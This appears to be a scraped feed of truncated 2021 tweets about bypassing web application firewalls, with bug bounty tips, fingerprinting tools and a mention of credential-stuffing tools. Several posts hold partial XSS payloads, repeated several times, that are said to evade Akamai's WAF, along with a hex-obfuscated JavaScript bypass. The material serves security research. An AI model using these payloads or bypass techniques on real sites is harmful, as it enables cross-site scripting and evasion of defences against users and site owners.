Add Hop-by-Hop to your list when you want to bypass WAF or authorization!! , You might end up getting access to the admin panel?
#bugbountytip ...October 1, 2021
Want to have scalable and cost effective way to protect API management serverless, or basic from malicious web traffic? https://t.co/DBlntskMTV ...September 30, 2021
WAF bypass in 3 steps:
1. Fingerprint ?
- Manual techniques (WAFs often have telltale signs; see end for references)
- WAFW00F
- IdentYwaf
?thread ...September 29, 2021
A payload to bypass Akamai WAF, by @stealthybugs
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/st ...September 29, 2021
Hi @jgrahamc, why doesn't adding a firewall "allow" rule for an IP let it bypass WAF rules? rule 100167 is broken and even after whitelisting the IP i ...September 29, 2021
How attackers use #credentialstuffing cyberattack tools OpenBullet and MailRanger to bypass #CAPTCHA, compromise mailboxes, and reset passwords. John ...September 28, 2021
A payload to bypass Akamai WAF, by @stealthybugs
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/st ...September 28, 2021
Akamai XSS WAF bypass. Working in all browsers.
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stea ...September 28, 2021
Akamai XSS WAF bypass. Working in all browsers.
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stea ...September 27, 2021
neat WAF bypass I used this week (blocked .[](){} constructor and more)
Function`\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f ...September 24, 2021